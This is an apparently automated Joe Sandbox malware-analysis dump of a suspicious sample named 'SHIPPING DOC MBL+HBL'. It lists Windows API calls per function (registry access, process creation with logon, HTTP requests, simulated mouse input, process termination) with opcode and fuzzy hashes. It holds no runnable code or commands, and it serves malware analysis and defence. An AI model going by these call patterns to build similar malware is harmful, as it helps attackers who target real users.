                    • Opcode Fuzzy Hash: d71ad6ed913707e2b815a32644a8879520e2049a879510b7f1fec780915a6271
                    • Instruction Fuzzy Hash: 1E619A3065025A9BDF11EF64E882AFE7BE4AF44348F046519F89A7B1D3DB30AD41CB90
                    APIs
                      • Part of subcall function 00E07F41: _memmove.LIBCMT ref: 00E07F82
                      • Part of subcall function 00E80EA5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E7FE38,?,?), ref: 00E80EBC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E80348
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E80388
                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00E803AB
                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00E803D4
                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00E80417
                    • RegCloseKey.ADVAPI32(00000000), ref: 00E80424
                    Similarity
                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                    • String ID:
                    • API String ID: 4046560759-0
                    • Opcode ID: 21175da51eac87eb3b6fa655d1a49cd50fa1a0c9b12a0d947b925caf7a78561a
                    • Instruction ID: 77a4789cebf6ca9b8b628431719bb9111b5d488fa9731544d8dd66c9e57616dc
                    • Opcode Fuzzy Hash: 21175da51eac87eb3b6fa655d1a49cd50fa1a0c9b12a0d947b925caf7a78561a
                    • Instruction Fuzzy Hash: FA513931208200AFD714EF64D885E6FBBE9FF88314F04591DF599A72A2DB31E949CB52
                    APIs
                    • GetMenu.USER32(?), ref: 00E85864
                    • GetMenuItemCount.USER32(00000000), ref: 00E8589B
                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00E858C3
                    • GetMenuItemID.USER32(?,?), ref: 00E85932
                    • GetSubMenu.USER32(?,?), ref: 00E85940
                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 00E85991
                    Similarity
                    • API ID: Menu$Item$CountMessagePostString
                    • String ID:
                    • API String ID: 650687236-0
                    • Opcode ID: 748ec243a7faab1b9a011b46aeeb93bd0091ca063d82a3232d9bb1af1499fc2a
                    • Instruction ID: 9cda5e4e581923f477647e08079821997371ebfcc9177c44f1b65ee8ce8d2f5a
                    • Opcode Fuzzy Hash: 748ec243a7faab1b9a011b46aeeb93bd0091ca063d82a3232d9bb1af1499fc2a
                    • Instruction Fuzzy Hash: C0519436A00615EFCF15EFA4C845AAEB7F4EF48320F10546AE959B7351CB70AE41CB90
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 00E5F218
                    • VariantClear.OLEAUT32(00000013), ref: 00E5F28A
                    • VariantClear.OLEAUT32(00000000), ref: 00E5F2E5
                    • _memmove.LIBCMT ref: 00E5F30F
                    • VariantClear.OLEAUT32(?), ref: 00E5F35C
                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00E5F38A
                    Similarity
                    • API ID: Variant$Clear$ChangeInitType_memmove
                    • String ID:
                    • API String ID: 1101466143-0
                    • Opcode ID: 19e0e943d663eb06d1c175f95a39f80f8bbde664aec7a9fdfb5359158a7f53bd
                    • Instruction ID: 7446d9f14bdb531d851dee1e8c1cf9d4120e85c8a75dba799fe585759c58bb42
                    • Opcode Fuzzy Hash: 19e0e943d663eb06d1c175f95a39f80f8bbde664aec7a9fdfb5359158a7f53bd
                    • Instruction Fuzzy Hash: EE5139B5A00209EFDB14CF58C884AAAB7B8FF4C315B15856AED59EB301D730E915CFA0
                    APIs
                    • _memset.LIBCMT ref: 00E62550
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E6259B
                    • IsMenu.USER32(00000000), ref: 00E625BB
                    • CreatePopupMenu.USER32 ref: 00E625EF
                    • GetMenuItemCount.USER32(000000FF), ref: 00E6264D
                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00E6267E
                    Similarity
                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                    • String ID:
                    • API String ID: 3311875123-0
                    • Opcode ID: 4990fe1e85cbd0d17354cb504e02a643d31b07fd134a5fc940029e97e2ea7889
                    • Instruction ID: 21e69acd8abcc3b44dbc4df8742b966450ce8aab3f3fe3723caea6e1a59611d7
                    • Opcode Fuzzy Hash: 4990fe1e85cbd0d17354cb504e02a643d31b07fd134a5fc940029e97e2ea7889
                    • Instruction Fuzzy Hash: 2B51C170A40A06DFDF20CF68E888AADBBF4BF14398F14916DEA15B7290D7709944CB52
                    APIs
                      • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 00E0179A
                    • GetWindowRect.USER32(?,?), ref: 00E017FE
                    • ScreenToClient.USER32(?,?), ref: 00E0181B
                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E0182C
                    • EndPaint.USER32(?,?), ref: 00E01876
                    Similarity
                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                    • String ID:
                    • API String ID: 1827037458-0
                    • Opcode ID: 6ae6c0c6d9ea3ddb7fb205d4002f66f9d8e52db059891826576d4fa0735d76c9
                    • Instruction ID: 6f16c40b987b4fa31e0c6db431f6cc1668f40170c2ba0e27edc48ff04686b8b0
                    • Opcode Fuzzy Hash: 6ae6c0c6d9ea3ddb7fb205d4002f66f9d8e52db059891826576d4fa0735d76c9
                    • Instruction Fuzzy Hash: E841B031100200AFC710DF25DC88FBA7BE8EB45724F044279FA95AA1F2C731A889DB61
                    APIs
                    • ShowWindow.USER32(00EC57B0,00000000,00FC5FB0,?,?,00EC57B0,?,00E8B5DC,?,?), ref: 00E8B746
                    • EnableWindow.USER32(00000000,00000000), ref: 00E8B76A
                    • ShowWindow.USER32(00EC57B0,00000000,00FC5FB0,?,?,00EC57B0,?,00E8B5DC,?,?), ref: 00E8B7CA
                    • ShowWindow.USER32(00000000,00000004,?,00E8B5DC,?,?), ref: 00E8B7DC
                    • EnableWindow.USER32(00000000,00000001), ref: 00E8B800
                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00E8B823
                    Similarity
                    • API ID: Window$Show$Enable$MessageSend
                    • String ID:
                    • API String ID: 642888154-0
                    • Opcode ID: d58846d53e86329f143a8c7d139c7414566ace6c17fff59a270cff09a55b610c
                    • Instruction ID: f8c302eb3a5ba13879fddfda31525f73679d986067f38e2f1b168f075db62ab8
                    • Opcode Fuzzy Hash: d58846d53e86329f143a8c7d139c7414566ace6c17fff59a270cff09a55b610c
                    • Instruction Fuzzy Hash: 8F418435600244EFDB25DF24C489B947BE1FF45319F1842BAF94CAF2A2C732A846CB95
                    APIs
                    • GetForegroundWindow.USER32(?,?,?,?,?,?,00E74F57,?,?,00000000,00000001), ref: 00E771C1
                      • Part of subcall function 00E73AB6: GetWindowRect.USER32(?,?), ref: 00E73AC9
                    • GetDesktopWindow.USER32 ref: 00E771EB
                    • GetWindowRect.USER32(00000000), ref: 00E771F2
                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00E77224
                      • Part of subcall function 00E652EB: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E65363
                    • GetCursorPos.USER32(?), ref: 00E77250
                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00E772AE
                    Similarity
                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                    • String ID:
                    • API String ID: 4137160315-0
                    • Opcode ID: 338d03a414ae211d86343e25967a54c284fb2b9d4940f265258ac7f97fb9c8fb
                    • Instruction ID: 4e166b4240fab8362f9565bd281caf52300f512a02d2658473d2157eb4535dab
                    • Opcode Fuzzy Hash: 338d03a414ae211d86343e25967a54c284fb2b9d4940f265258ac7f97fb9c8fb
                    • Instruction Fuzzy Hash: F9310472209305AFD720DF14D849B9BB7E9FF88304F001929F498A71A1CB30ED09CB92
                    APIs
                      • Part of subcall function 00E583D1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E583E8
                      • Part of subcall function 00E583D1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E583F2
                      • Part of subcall function 00E583D1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E58401
                      • Part of subcall function 00E583D1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E58408
                      • Part of subcall function 00E583D1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E5841E
                    • GetLengthSid.ADVAPI32(?,00000000,00E58757), ref: 00E58B8C
                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E58B98
                    • HeapAlloc.KERNEL32(00000000), ref: 00E58B9F
                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00E58BB8
                    • GetProcessHeap.KERNEL32(00000000,00000000,00E58757), ref: 00E58BCC
                    • HeapFree.KERNEL32(00000000), ref: 00E58BD3
                    Similarity
                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                    • String ID:
                    • API String ID: 3008561057-0
                    • Opcode ID: 969c7f01ceaad6a3b7e96c2465951019d147bd89222e4a4280297dd33c5563f4
                    • Instruction ID: 87ab2e5bafdb63fc17460582d0453f2d19ba22686a76bf8e068505d15c7ebc91
                    • Opcode Fuzzy Hash: 969c7f01ceaad6a3b7e96c2465951019d147bd89222e4a4280297dd33c5563f4
                    • Instruction Fuzzy Hash: DC11B1B5901205FFDB909FA5CD09FAE77ACEB4531AF104828E949F7150CB319A08CB60
                    APIs
                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00E5890A
                    • OpenProcessToken.ADVAPI32(00000000), ref: 00E58911
                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00E58920
                    • CloseHandle.KERNEL32(00000004), ref: 00E5892B
                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E5895A
                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 00E5896E
                    Similarity
                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                    • String ID:
                    • API String ID: 1413079979-0
                    • Opcode ID: f419000132f29dc0462fba9e3d07c664718d32d6510f6e9c55d1d5b13aaa398a
                    • Instruction ID: 067a87ac6054105835385a861f7c55d444a634a0c081ef3a28afca0a3c0a954d
                    • Opcode Fuzzy Hash: f419000132f29dc0462fba9e3d07c664718d32d6510f6e9c55d1d5b13aaa398a
                    • Instruction Fuzzy Hash: 48115C72500209AFDF018FA5DD49BEA7BA9EF49319F144065FE08B2160C7768D68AB61
                    APIs
                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E20313
                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00E2031B
                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E20326
                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E20331
                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00E20339
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E20341
                    Similarity
                    • API ID: Virtual
                    • String ID:
                    • API String ID: 4278518827-0
                    • Opcode ID: 559457ea0a1c4adb0b58381e04bc51ca5cd8553ca50f1dd6d4907c48ce253a4e
                    • Instruction ID: 37620c0a6671a5cec699ac88e052411fee0bf3f1276c3770c25fc5cdfde5b358
                    • Opcode Fuzzy Hash: 559457ea0a1c4adb0b58381e04bc51ca5cd8553ca50f1dd6d4907c48ce253a4e
                    • Instruction Fuzzy Hash: 7F016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BE15C87941C7F5A868CBE5
                    APIs
                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E654A0
                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E654B6
                    • GetWindowThreadProcessId.USER32(?,?), ref: 00E654C5
                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E654D4
                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E654DE
                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E654E5
                    Similarity
                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                    • String ID:
                    • API String ID: 839392675-0
                    • Opcode ID: 6ab56f2f22217a39d91cd373cfa83795e7b7d41cbc9954615523815618b6515c
                    • Instruction ID: 18a7f98f61b852f3bf53ed29642f54404d70d670f3a187d54aab213bdbbec69f
                    • Opcode Fuzzy Hash: 6ab56f2f22217a39d91cd373cfa83795e7b7d41cbc9954615523815618b6515c
                    • Instruction Fuzzy Hash: 16F06232241118BFD3215B93DC0DEAB7A7CEFCAB11F000169F909E1051E6A01A0597B5
                    APIs
                    • InterlockedExchange.KERNEL32(?,?), ref: 00E672EC
                    • EnterCriticalSection.KERNEL32(?,?,00E11044,?,?), ref: 00E672FD
                    • TerminateThread.KERNEL32(00000000,000001F6,?,00E11044,?,?), ref: 00E6730A
                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00E11044,?,?), ref: 00E67317
                      • Part of subcall function 00E66CDE: CloseHandle.KERNEL32(00000000,?,00E67324,?,00E11044,?,?), ref: 00E66CE8
                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E6732A
                    • LeaveCriticalSection.KERNEL32(?,?,00E11044,?,?), ref: 00E67331
                    Similarity
                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                    • String ID:
                    • API String ID: 3495660284-0
                    • Opcode ID: 8a8951fc3f05f058a8a8b56555ab05abe2e9e4cfd886d247e0f9178ad2d13690
                    • Instruction ID: 5396533a83f5093d1ba1ac360436d1eb1fcafae24fb46fb4657cad1d0c767b7e
                    • Opcode Fuzzy Hash: 8a8951fc3f05f058a8a8b56555ab05abe2e9e4cfd886d247e0f9178ad2d13690
                    • Instruction Fuzzy Hash: 9EF08236581612EFE7111B65FD8C9DB773AFF49712B101531F506B10B1CB759815CBA0
                    APIs
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E58C5F
                    • UnloadUserProfile.USERENV(?,?), ref: 00E58C6B
                    • CloseHandle.KERNEL32(?), ref: 00E58C74
                    • CloseHandle.KERNEL32(?), ref: 00E58C7C
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00E58C85
                    • HeapFree.KERNEL32(00000000), ref: 00E58C8C
                    Similarity
                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                    • String ID:
                    • API String ID: 146765662-0
                    • Opcode ID: 6652bd9b19f8a72426b3e195c597f5b9e8190748296d57d689ec8977b1d0c289
                    • Instruction ID: 4f38d140f51314c040ab9ea8713d28c79b8c98bc657e8ccc59a5474d20c28a84
                    • Opcode Fuzzy Hash: 6652bd9b19f8a72426b3e195c597f5b9e8190748296d57d689ec8977b1d0c289
                    • Instruction Fuzzy Hash: B1E0C236004001FFDA011FE2EC0C90ABB69FB89322B108231F219E1075CB329428DB50
                    APIs
                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00E92C7C,?), ref: 00E57A12
                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00E92C7C,?), ref: 00E57A2A
                    • CLSIDFromProgID.OLE32(?,?,00000000,00E8FB80,000000FF,?,00000000,00000800,00000000,?,00E92C7C,?), ref: 00E57A4F
                    • _memcmp.LIBCMT ref: 00E57A70
                    Strings
                    Similarity
                    • API ID: FromProg$FreeTask_memcmp
                    • String ID: ,,
                    • API String ID: 314563124-1556401989
                    • Opcode ID: 84b9a4a02824de28d88e3e321b75298e23e278c55797696b8363de4965330cdd
                    • Instruction ID: ca6eac77f5739dae48bd805df9932b0512756d3cc0fb98c2b680324902002d97
                    • Opcode Fuzzy Hash: 84b9a4a02824de28d88e3e321b75298e23e278c55797696b8363de4965330cdd
                    • Instruction Fuzzy Hash: FE810871A00109EFCB04DF94C884EEEB7B9FF89315F205598E955BB250DB71AE0ACB60
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 00E78728
                    • CharUpperBuffW.USER32(?,?), ref: 00E78837
                    • VariantClear.OLEAUT32(?), ref: 00E789AF
                      • Part of subcall function 00E6760B: VariantInit.OLEAUT32(00000000), ref: 00E6764B
                      • Part of subcall function 00E6760B: VariantCopy.OLEAUT32(00000000,?), ref: 00E67654
                      • Part of subcall function 00E6760B: VariantClear.OLEAUT32(00000000), ref: 00E67660
                    Strings
                    Similarity
                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                    • API String ID: 4237274167-1221869570
                    APIs
                      • Part of subcall function 00E1FE06: _wcscpy.LIBCMT ref: 00E1FE29
                    • _memset.LIBCMT ref: 00E62E7F
                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E62EAE
                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E62F61
                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00E62F8F
                    Strings
                    Similarity
                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                    • String ID: 0
                    • API String ID: 4152858687-4108050209
                    APIs
                    • _memset.LIBCMT ref: 00E62AB8
                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00E62AD4
                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00E62B1A
                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00EC5890,00000000), ref: 00E62B63
                    Strings
                    Similarity
                    • API ID: Menu$Delete$InfoItem_memset
                    • String ID: 0
                    • API String ID: 1173514356-4108050209
                    APIs
                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00E7D8D9
                      • Part of subcall function 00E079AB: _memmove.LIBCMT ref: 00E079F9
                    Strings
                    Similarity
                    • API ID: BuffCharLower_memmove
                    • String ID: cdecl$none$stdcall$winapi
                    • API String ID: 3425801089-567219261
                    APIs
                      • Part of subcall function 00E07F41: _memmove.LIBCMT ref: 00E07F82
                      • Part of subcall function 00E5AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00E5AEC7
                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E591D6
                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E591E9
                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00E59219
                      • Part of subcall function 00E07D2C: _memmove.LIBCMT ref: 00E07D66
                    Strings
                    Similarity
                    • API ID: MessageSend$_memmove$ClassName
                    • String ID: ComboBox$ListBox
                    • API String ID: 365058703-1403004172
                    APIs
                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E71962
                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E71988
                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00E719B8
                    • InternetCloseHandle.WININET(00000000), ref: 00E719FF
                      • Part of subcall function 00E72599: GetLastError.KERNEL32(?,?,00E7192D,00000000,00000000,00000001), ref: 00E725AE
                      • Part of subcall function 00E72599: SetEvent.KERNEL32(?,?,00E7192D,00000000,00000000,00000001), ref: 00E725C3
                    Strings
                    Similarity
                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                    • String ID:
                    • API String ID: 3113390036-3916222277
                    APIs
                      • Part of subcall function 00E01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E01D73
                      • Part of subcall function 00E01D35: GetStockObject.GDI32(00000011), ref: 00E01D87
                      • Part of subcall function 00E01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E01D91
                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00E86493
                    • LoadLibraryW.KERNEL32(?), ref: 00E8649A
                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00E864AF
                    • DestroyWindow.USER32(?), ref: 00E864B7
                    Strings
                    Similarity
                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                    • String ID: SysAnimate32
                    • API String ID: 4146253029-1011021900
                    APIs
                    • GetStdHandle.KERNEL32(0000000C), ref: 00E66E65
                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E66E98
                    • GetStdHandle.KERNEL32(0000000C), ref: 00E66EAA
                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00E66EE4
                    Strings
                    Similarity
                    • API ID: CreateHandle$FilePipe
                    • String ID: nul
                    • API String ID: 4209266947-2873401336
                    APIs
                    • GetStdHandle.KERNEL32(000000F6), ref: 00E66F32
                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E66F64
                    • GetStdHandle.KERNEL32(000000F6), ref: 00E66F75
                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00E66FAF
                    Strings
                    Similarity
                    • API ID: CreateHandle$FilePipe
                    • String ID: nul
                    • API String ID: 4209266947-2873401336
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 00E6ACDE
                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00E6AD32
                    • __swprintf.LIBCMT ref: 00E6AD4B
                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,00E8F910), ref: 00E6AD89
                    Strings
                    Similarity
                    • API ID: ErrorMode$InformationVolume__swprintf
                    • String ID: %lu
                    • API String ID: 3164766367-685833217
                    APIs
                      • Part of subcall function 00E07D2C: _memmove.LIBCMT ref: 00E07D66
                      • Part of subcall function 00E5A15C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E5A179
                      • Part of subcall function 00E5A15C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E5A18C
                      • Part of subcall function 00E5A15C: GetCurrentThreadId.KERNEL32 ref: 00E5A193
                      • Part of subcall function 00E5A15C: AttachThreadInput.USER32(00000000), ref: 00E5A19A
                    • GetFocus.USER32 ref: 00E5A334
                      • Part of subcall function 00E5A1A5: GetParent.USER32(?), ref: 00E5A1B3
                    • GetClassNameW.USER32(?,?,00000100), ref: 00E5A37D
                    • EnumChildWindows.USER32(?,00E5A3F5), ref: 00E5A3A5
                    • __swprintf.LIBCMT ref: 00E5A3BF
                    Strings
                    Similarity
                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                    • String ID: %s%d
                    • API String ID: 1941087503-1110647743
                    APIs
                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00E7ED1B
                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00E7ED4B
                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00E7EE7E
                    • CloseHandle.KERNEL32(?), ref: 00E7EEFF
                    Similarity
                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                    • String ID:
                    • API String ID: 2364364464-0
                    APIs
                    Similarity
                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                    • String ID:
                    • API String ID: 1559183368-0
                    APIs
                      • Part of subcall function 00E07F41: _memmove.LIBCMT ref: 00E07F82
                      • Part of subcall function 00E80EA5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E7FE38,?,?), ref: 00E80EBC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E80188
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E801C7
                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00E8020E
                    • RegCloseKey.ADVAPI32(?,?), ref: 00E8023A
                    • RegCloseKey.ADVAPI32(00000000), ref: 00E80247
                    Similarity
                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                    • String ID:
                    • API String ID: 3440857362-0
                    APIs
                      • Part of subcall function 00E09997: __itow.LIBCMT ref: 00E099C2
                      • Part of subcall function 00E09997: __swprintf.LIBCMT ref: 00E09A0C
                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00E7DA3B
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00E7DABE
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00E7DADA
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00E7DB1B
                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00E7DB35
                      • Part of subcall function 00E05B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E6793F,?,?,00000000), ref: 00E05B8C
                      • Part of subcall function 00E05B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E6793F,?,?,00000000,?,?), ref: 00E05BB0
                    Similarity
                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                    • String ID:
                    • API String ID: 327935632-0
                    APIs
                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00E6E6AB
                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00E6E6D4
                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00E6E713
                      • Part of subcall function 00E09997: __itow.LIBCMT ref: 00E099C2
                      • Part of subcall function 00E09997: __swprintf.LIBCMT ref: 00E09A0C
                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00E6E738
                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00E6E740
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                    • String ID:
                    • API String ID: 1389676194-0
                    • Opcode ID: 975a16e88d739db8de929f61ebed4a7b2af8c5a4b4fc4481b35929362905aec1
                    • Instruction ID: a6ea5c31f811dc1c8fa70d11edc6e266810a952f62d8c1e2afb4459b77cd8bf5
                    • Opcode Fuzzy Hash: 975a16e88d739db8de929f61ebed4a7b2af8c5a4b4fc4481b35929362905aec1
                    • Instruction Fuzzy Hash: B9513A39A00215DFCF05EF64C981AAEBBF5EF48314B149099E849BB3A2CB31ED51CB50
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 71a470a1337fdae17ab416282ad413e2636d4e98982db6aa887b29226c0b03fe
                    • Instruction ID: 642b716b7fe49b7e7b1e9e132c734f183234d0b9f6f90cf18c4111100bcef477
                    • Opcode Fuzzy Hash: 71a470a1337fdae17ab416282ad413e2636d4e98982db6aa887b29226c0b03fe
                    • Instruction Fuzzy Hash: C941D3B5902104AFE710EF28CC4DFA9BBA5EB09364F191276E81DB72E1C730AD41DB51
                    APIs
                    • GetCursorPos.USER32(?), ref: 00E02357
                    • ScreenToClient.USER32(00EC57B0,?), ref: 00E02374
                    • GetAsyncKeyState.USER32(00000001), ref: 00E02399
                    • GetAsyncKeyState.USER32(00000002), ref: 00E023A7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: AsyncState$ClientCursorScreen
                    • String ID:
                    • API String ID: 4210589936-0
